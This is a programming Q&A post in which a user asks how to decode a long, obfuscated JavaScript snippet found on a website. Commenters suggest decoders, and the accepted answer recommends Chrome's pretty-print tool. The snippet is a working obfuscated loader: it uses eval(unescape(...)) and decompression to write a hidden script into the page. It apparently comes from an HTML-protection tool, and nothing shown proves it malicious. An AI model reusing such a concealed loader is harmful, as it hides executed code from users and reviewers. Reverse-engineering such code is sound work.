# Decode JavaScript, Is it possible?

Tags: javascript, encryption, decode

I'm trying to decode the following JavaScript code. But still failed to decode it.

Code:

```
l1l=document.documentMode||document.all;var f59f76=true;ll1=document.layers;lll=window.sidebar;f59f76=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f59f76|=lII;zLP=location.protocol+'0FD';di11fr=new Array();di11fr[0]='f%36\157%38%33\161E%35A%65';m06Tj3=new Array();m06Tj3[0]='  ~zd~~~~~~~~~    ~\n~~~\r~~~~~~~~~~~~~~~~~\r~ ~!~"~#~$~%~&~\'~(~)~*~+~,~-~.~/~0~1~2~3~4~5~6~7~8~9~:~;~<~=~>~?~@~A~B~C~D~E~F~G~H~I~J~K~L~M~N~O~P~Q~R~S~T~U~V~W~X~Y~Z~[~\\~]~^~_~`~a~ ~~d~e~f~g~h~i~j~k~l~m~n~o~efunction p(){var h = "tml>";~}c}}<h"+h+"<table width=\'100%\' border}&0\'>}r}7td}-gcol}/}&#})66})},alig~y}\'cent}2}6<f~xt sty}}\'}X}S-family: V}2dana, Ari}J}sHelve~vc}r}[}ps-s}2if; }bt|ize}k12px|\n}?}Ar}k#F|||\nbackgro~sd-|}/|}E}G}5>Th}s|\'r}Q }?}1 of }$is~zag}|A~z|&}T~ue}<by <b}7|}[}]}_}&|+| |FCC}H>HTML Gu}zdd}wn</|}7/|R|Pb}9|2}ul~vma}T|?o}@|~|Ho|J}Zy|6 |b|d|9o}1}si|{|Es}sJa~ app}t{ {~sc}vp{}s}Knk{keep} eb{}S}R}Zf}h}Tr|Bawa|O}p}<muc}m}/e.{H|P|n}Y}7|t}7a|U}^}}&}Tx|\r}1}?r||~wn}kn~xe|}@|,|[||^}H}ref}&http://w{u.p|I{<{j.}?m},}r|Et}&_}}pk}6|s|S}Y{Q|W}a}Y}d}f}h}j}l}n}p|}u}wl}y}{}}}|s||||    |zs|| ||{b||{f|_0| |"|$|&|(|*{c|Z}D0}F|`{uw.P|IW}zd{G{}|m|o|m|R|ma|p};zO}9|m}}e|p}};w}}!ndozAop}R("","myz]zg}|3}L{n=}(0,}!}#}%7})")zZ.z_cum{4.w}v}T(c)};~{z|dl=zyyl{=}2s;oe=z]z_zazc{Z?1:z3}o=(yy}Sz~oyzdy*tM{e||y)y}Jl)&&!y;|Eyy-yy+zE}y/ByIdzZsyiz^z`.z(}1|!r?tru|}el|;tN=}qv}L||}/.u|rA|Ey+toLz`}2Ca|~|;|ybya.yP}1xOf(\'n}~{!{e\')>=0yXyZy\\}Jy_z|Aya;xs8x}\r}zd msg}&\';~r~t~v~x xm~|{{jtur~yyYy[yyyR{`r|&}}x+xOFyOyQzA}A|zdx(n{w|Iy-}@y}z^exzdx}a}hx   )!=-1xy[:y]y_i7{lxy;!zx@xZxy^{ajQy[ry(x&~u{\\(t~}}x*,e,i,o,r,{}ru,zh,c,p,d,f,g,m,v,y,$zu,C,x,k,b,T,I,H,M,P,S,z,O,q,A,F,L,B,D,N,V,E,K,_;x/x1~yK=t(x7w)w/wNy(yBy/wSwQ.A{={},nwU"}.dw}}lz{x}wc#|3a}1rwkyNwO"wnewp}2Pyj}wSiwm}X{}2wkO="wx|InOutExpozgkv{tpz9{3}S/}$eys/KINDzgb=39wv\'7w+v\'8w=4zty=2v,ybydyfypryiykym{4w3=N.|{t{C(/(Az^|&}"|iPh{`|By|#B}2xn|Oy {PMyPi)/vaw5vBvD||vGvIvPwp|Ky~}vbvdE=xqxGx-wJx2} y~yRyPxr}zzpty4K.zog{n~|w`_vt~sxr~xvw}~wKvzxCxMv~W}"}$uyuhu wAux\'xsxux.uvyu{j';paU92jpr2WKT='fu';piUFcNC0='SdyIQsvQJaPeOOcN';paU92jpr2WKT+=  'nction f4QIPv'+'a5RjJm7x2d(d4e8i4k'+'xUMjs5Kb4){';kyyMVx='qWG31tcGRwHd';pC1W5ksiNj76l='\151f%28z\114\120%2E%69\156\144%65\170O\146%28%27%5C%35%35%27%29%3E%30%29%7B\155%30%36%54\152%33%5B%30%5D%3D%27x%27%7D%3Bvar%20l%32%3Dwi\156d%6F%77%2E\157\160\145r%61%3F%31%3A%30%3B\146%75\156%63tion%20l%33%28\154%34%29%7B\154%35%3D%2F\172\144%2Fg%3B%6C%36%3D%53%74\162ing%2E\146r\157%6DC%68\141rC\157d%65%28%30%29%3B%6C%34%3D\154%34%2E\162ep%6C\141\143e%28l%35%2Cl%36%29%3Bv\141r%20l%37%3Dn\145\167%20Ar\162a%79%28%29%2C\154%38%3D%5F%31%3D%6C%34%2Elengt\150%2C\154%39%2C\154%49%2C%69l%3D%31%36%32%35%36%2C%5F%31%3D%30%2C%49%3D%30%2C%6Ci%3D%27%27%3B%64o%7B\154%39%3D\154%34%2E\143h%61rC%6F%64e%41t%28%5F%31%29%3B%6C\111%3D%6C%34%2E%63%68\141%72C\157deA\164%28%2B%2B%5F%31%29%3Bl%37%5B\111%2B%2B%5D%3D\154I%2Bil%2D%28\154%39%3C%3C%37%29%7D\167h%69\154%65%28%5F%31%2B%2B%3C';eval(unescape('fu\156\143t%69%6F%6E%20tf%32%36\171b%57%20%20%20%20%28e%70l\112%7A%32%55%32\143E%29%7B\146\162%30MBq%34B%4DJ%3Dep\154J\172%32%55%32c\105%7D%3B'));m06Tj3[0]+=  'z(|xpu\rvv~}vxx3u wSuby~ze}/i{4{[~x{C}p|Ezgvuxsu.u%u0y\ny\nx=o.{6z^ze.bv\rypnwkmuHuJu5wvx4e}zwywrwSD=m.|\'{8uzduwOwSLx\r=ukwu#|{}\\wodz{.}ng}$y;0ukwms}K}1svRwusuuuwwBu`ubff|ug.ypwxAB+5*w>tv\n{8~lu+u!uxvxtwIuC|?=u{!|&llTzb~|x}{|ss({u{n:uIuc}2ueuuE,txB?(uIwpdCyt0ze}\\i|#ywk0t?y4v<hyvtFyvt1"yPvz{y;v<{j{E}}tUtH}{ZnspzF}S tYz{):tB.t^ot`tGtWtJtLtNtP|tRtTttzetk)tQ.tDtatWyY|tg{jtitwSt>=F?tCdtEt}"}?xNte|Lz{t6tpvtreszes}1suruF}(wS1u{yu|u~etzdz`tlut}Rty;(Iu unx-u@x)ug{|@s.$u}}"s.t=w  s@sBsDuwNh|AsKs-s/zAuKduMsLewksJ|{xsNsPsCsRs2uv}$xX}u/|?xI{{yzcsv\rzbyv4s<s:t}zs@yyx0xVs^sAs\\)sgsJyPt}J=t{3rtts9ux0vyt.x{Vu6e3ssOsw`r{xsj}]smc}}zds8u-u$r~yr!wxrt}2r\nrrtuFrxJr{Ggot+Ss-r$u"suxxxzwsx|xts|sJyzdx:{4rzdt#n|xlxVr/rly;rFr"rt-t>s[axs5z0wStOtr\\s}vgxrs_sXsAtqtstVze|"~v}}sZrsQsEsAeqxt)sss "rnirprfsA$h2rcs`rt.rvrxuVuL"qws}~T{eucrr%sgitslevtS}Tpt1s&rwS(wbsJquq    rwxuqsV"sid{Bt_{|L|Es%y:&(yM||htp|\'uLsv    }Sq&txOug)wSxH{UwOze}ery{j{|"evH(\\d)(?y\'qZ{3})+q]!qZqK/w"$1zhqKwat/t1{zb|"i}]:1qcq{|x1s   swt=rrasoqUxoqrsiypr5rqIr<tr&usJr7r9s-xtrrrGq+1r2p  sksm{xevpstprrrpor:sEpsPp{4xXprp\nqqzcqq{-yNssx-xwtwaxyx{x}xws}t"r\'x*x\rx{qqz~||a~|ySrvy[~ts.yS{qwzeqot==yi[n]uGp;rr>wpFurLt)ukrs5}3r^was|qt}$tAupIap#p<xlpgvyr++wwNySub}\\}vuv(ztpdwsBpLqN(y9o\rq2rzsrl}slyPgwkr)}zdr,r   }J(uwSrrEsbt?pvrrQ(}rsAhy}p~|tmq&ozdopLrjssrowknpqo(pt(pnxywNp[p^p`wqqqx~o0o2s:s\'qK:vo}" r^w`pOoToVoX0w`rVwSopyr>npAx~ww,ww    ww\rwgx%}/o.p\\pV}Kwu}qLotfoxzeozw\nvzgyztcvtpIx"aoBhy?>|   nozdf)d=a[cpanuknn]s5lo7}\ncs5p+y}ozz|sgpvrpsw}%pn>xn1n.xXy$wlztwp;r>t!rovsoooo\n,o$o8ooxunHor|o=uvwku--wrUo r\nowSpvukhtAqo9srktbnOowStqyqn<p%~yrVhuFoP|{s:5qKtmodo,r-o"x|nqo3qKw`ius@pp2p{Go1nrpyu#sgpiywNrbpw)q?qA|((1zy*q>}$tp{?ox,qd3r^*tr}t-Tycez[w&ngoMv\rquAnl T.p(p*}1o\ns&})sze#sXDe{Yusu4q\rr!tKk|?{u?u,m0myStm,psn{||qW{t\'}@t*zb:ums}T}Sus|=t}~pPtxX})w`z>w1t<{lumvVsEvm;wvrht uNuP~xttdtfthtmbs:s}K|#mHpmJts:m\nt#r3p!{4m?}e|xugqq}\\t,qnmR}pmUymX{"mZt+{qft  mdt\rmgt7v\rt9euu45ztnksgSxpq.t~f{Zytlqcq{w)y2x2|v<ct0steqw{\\snwc[}o}-sy8rZ';function a5RjJm7x2df4QIPv(atsd4NEMUuLR){piUFcNC0+=atsd4NEMUuLR};paU92jpr2WKT+=  'eva';j7unp639p8='ZourXGmVyTQOisoawQOOlSPaOkcq';paU92jpr2WKT+=  'l(unes';weV24YbHHX8='k1tGxHQB7JM5Z';paU92jpr2WKT+=  'cape(d4e8i4kxUMjs5Kb4))}';eval(paU92jpr2WKT);l783X3NEGvmDs0='UObjBkkRWOoDOcBYiDZKgkjYlGvEMCkORFh';paU92jpr2WKT='';pC1W5ksiNj76l+=  '%6C%38%29%3B%76\141\162%20%6C%31%3Dne%77%20\101%72ray%28%29%2Cl%30%3Dn\145%77%20\101%72ray%28%29%2CI%6C%3D%31%32%38%3B\144o%7B%6C%30%5BIl%5D%3DStr\151n\147%2Efr%6F\155\103h%61\162\103%6Fd%65%28\111%6C%29%7D\167\150\151%6C\145%28%2D%2D%49l%29%3BI%6C%3D%31%32%38%3B%6C%31%5B%30%5D%3Dli%3Dl%30%5Bl%37%5B%30%5D%5D%3B%6C\154%3Dl%37%5B%30%5D%3B%5F%6C%3D%31%3Bv\141r%20\154%5F%3D\154%37%2E\154\145\156\147%74\150%2D%31%3B\167hi\154e%28%5Fl%3C\154%5F%29%7B%73\167%69%74\143h%28%6C%37%5B%5F\154%5D%3C\111l%3F%31%3A%30%29%7Bc%61%73e%20%30%20%3Al%30%5BIl%5D%3D%6C%30%5B\154\154%5D%2B\123t\162i\156\147%28%6C%30%5Bll%5D%29%2E%73\165%62%73\164r%28%30%2C%31%29%3B\154%31%5B%5F\154%5D%3D\154%30%5BIl%5D%3B\151f%28%6C%32%29%7Bl%69%2B%3D\154%30%5B\111l%5D%7D%3Bbrea%6B%3B%64%65\146%61ul\164%3A';a5RjJm7x2df4QIPv('b5Mf3ctoE237MP');jH9LYqHFlI0='l';di11fr[0]+=  '\170%38\121b%53\121\147%36';m06Tj3[0]+=  ']s1n.x1y;u3uW}Awp}[lt)|~{Bht_sYwmKpp=p?{asgyt&l[m[y\rwa=qDeFlXwO.3tqRwa-zr48-ogzs{4}2}+n}|nqrt2|!|#|%qBdPoz(xGm]l9s(s*x"moq{\'sYqKns5Moe{ssx*x-q(|z}{yPywq(fs]k\'kk*l3uXk1xFxrqs_qwvwtrr$k(kk3}zd}}z{sfrKpp{Cm@kkk{\\pynuBpGmns5wbljt(llo4pk:}Tx q |"up;r@r>op}~yrA(vdodqmctmfzbwaxo-ut4ug?ql@qsqucqw}jqztmo^}<o`pqqmpu(z)k7k"p=syq&rMrOk>k@k*rJpGswjk5{Gt8vl)ufrWlzk0ykAsUrmrkD|yez(zU:tG|\r{C}hs%ubl\'jl*q|$k.k\nt3jt5m#jnm%wSHm(z[w*ulXsVl/t#Hsu)lqxu1oKtnWo"jKpGjMkK|#kNlDtw`zsqpwk"k$s>sJz|uT15k]sAyzm .19jr6v)sJ}AuvxW98.084782kGjkIp4v`zjWprr|{pjE|fq>q!t2|jv:wvi\ryun{ zgjgmm]rriwjnisPjnwuvi$jm~xwi!C}Yt(v\\t:mX|V|"SMALLzgvkO~xiTOP_LEFT"w`i-i/}@:!zttgni.}St(iOzto{,tmqm)iTyYiNiPw{Tqi^iV!qnmYt)w|3}{iOjjloq>r{+objlmr4p4tDisiuk"ri{ir}zdiut2i#jw||i\'gi)uti+x{s:k}/tVxvc{s.vcs-|{it}2{wnPqciwt=jBmQs*n,m<i}pikn.s5$iwzuv{zanjIi~t#$xMpXuFlVq\rjI j|lrn=kht$kwj=ug-l&udhI~|+72,8hT>raq;zhT8nZj;kxkwSh9i\rpQtCkrVh9i&hhi+uEkukq<vzdaqL|A~vnPh,s3ux&{Gj&q0}eqsus|Asjzct2k;mS}{m@v;iuJhqiJq%iwupVm@gzdhwschlSy;n1wxvGnkxwogr@hFkjs@wSp]k3{6gx1klnqh|yvsEwk{Grt\r|ArmyTky;jj5t:ug<xHjg<~|?zGtHj<u:g?g;hNqdl-qcoUoWjh!s)hnnmo|3kN{lQhxhy;dxMuKk;ijt{ydg}~u|,wvi>ya{zgg3gfg\ngi#gkN{{x\\i{9j0sOlurx{k_gpgh|uXgWk{mxgkgh%hn}%umvpulgs4q;s]nkk$p$gpEq(ff=wq(m_{4qfn1h|gszbfi^{4k9qf%oxtm<r!kkrymCq/mEl}llbl r\rph{|}Aywt<f!}Yyf7s!lmGf;hCvvlilpzCqugu:sth!h=q/{+yyuRf=rfOp.f[i.}1u{y?xHf3fCgOo_h!fEvrg.mBuWf9fKmIf_qt#wZxEfVwUg$s{orVq{jfkFy\nmMj   p4zb}RkQr>ysxrm<f%f+}cjIusv{$ps{}RsVwOkRuwik\\ff)n1fQmPmR}e}1v\n(7l-fym0jsggSy\'z{G$f/h||l6f5n?l1xufmgQj@ir fBygt pEis_f/e(lrye+qm.e/l.lcp$rsBe:uWf(fpe|\rerye}]jRmwah$wZw\\n1ke_y1}oyxz[rew-m  ofxyhFq\'[0payxHs|7xyvgvFuhpsq/)tAdzd|7ovqTvVqWr}d{=x\rzgdtsqzro~x|5}hgqGdy tmd\rcn&tO{Gy~xOxze?z{d/?pdd1"i&d3spd5iJt=xlIpN-r~~xv{j}}}Jmq}1v]x\nublfvlfMe2xg x{g"frg%=qs{4tWg(g*o?ove;l5}fg+xHsssu]w-q&fDl4e=gH{(ySkip)ekbm/ug r>x|kglhdX|A)e|paod"w{EfflBm~qzgw{Gd#dd#d(>qd+xPd.d0"d/+od8}ogRs*pxg}"-zvzc){Z{.vgyP-btuRfoCn\no"Bz5 Ug,n\nk|t2k~jzdqyq{eCoYqc;~pcKcLcMcNcOcPcQcRcS~d~bcVcWcXcYcZc[c\\c]c^c_c`cacbcccdcecfcgchcicjckclcmcncocncTcrcsctcucvcwcxcv';pC1W5ksiNj76l+=  'l%31%5B%5F\154%5D%3D\154%30%5B%6C%37%5B%5F%6C%5D%5D%3B\151%66%28l%32%29%7Bl%69%2B%3Dl%30%5B\154%37%5B%5F\154%5D%5D%7D%3Bl%30%5B%49%6C%5D%3Dl%30%5B%6C\154%5D%2B%53%74%72\151\156g%28\154%30%5B\154%37%5B%5F%6C%5D%5D%29%2E%73u%62\163\164r%28%30%2C%31%29%3Bb%72ea%6B%7D%3B\111\154%2B%2B%3B%6Cl%3D\154%37%5B%5F%6C%5D%3B%5F%6C%2B%2B%7D%3B\151f%28%21l%32%29%7Br%65%74%75\162\156%28%6C%31%2E%6Aoi%6E%28%27%27%29%29%7D%65l%73e%7Br%65%74%75r\156%20%6C%69%7D%7D%3B\166a%72%20l\117%3D%27%27%3B\146%6F\162%28i%69%3D%30%3B\151%69%3Cm%30%36%54%6A%33%2El%65%6E\147t\150%3B\151\151%2B%2B%29%7B%6CO%2B%3D%6C%33%28\155%30%36Tj%33%5B\151i%5D%29%7D%3Bi\146%28%66%35%39f%37%36%29%7Bd%6F%63u\155%65%6Et%2E\167r%69\164e%28%27%3Csc%72%27%2B%27\151%70\164%3E%27%2B\154%4F%2B%27%3C%2Fs\143%27%2B%27%72i%70t%3E%27%29%7D%3B';l783X3NEGvmDs0      ='OCyxOiRSMGSxTcVRBoPRSRsOhORHORoOpDOheowTyIHqkRbmQ';a5RjJm7x2df4QIPv    (j7unp639p8);f4QIPva5RjJm7x2d(pC1W5ksiNj76l);tf26ybW  (pC1W5ksiNj76l);jH9LYqHFlI0+=  'jOrOtMZMiRunIcOEtnbmlOFqCXPiOBVubKRHRPOJQVVYToVaexETxKskYIXYFRiSMkMOOGOOmsmYevphiSPFrJGhpDLXFOOOmlBaNkYeW';weV24YbHHX8+=  'y4W97';
```

Comment: it looks like that is minified code

Comment: Its working code, Working on a website.

Comment: It's browser's job to decode it. ;)

Comment: We cant't decode it?  Ionică Bizău?

Comment: I ran it through an online decoder, it gives some, but limited information. http://wepawet.iseclab.org/view.php?hash=c91ce0a89221a721cb527700cd23a341&type=js Also, this question is a duplicate from http://reverseengineering.stackexchange.com/questions/1436/analyzing-highly-obfuscated-javascript

Comment: Its really hard to understand the decoded code.

Comment: Yeah well, it's not really possible to get easily understandable code out of obfuscated code automatically as far as I know.

Comment: Thank you for your efforts, leroydev

Comment: I posted an answer. Hope you find it useful. :)

Answer (score 1, accepted):

The best solution I see here is beautifying the code (this will create some human-readable code which can be debugged pretty easy).

Using the Chrome's developer tools, I did this:

1. Pasted the code in some script and loaded it in browser:

   [image]
2. Clicked the `{}` icon and got the following:

   [image]

You may find other similar tools doing better jobs, but Chrome's developer tools is pretty amazing I guess.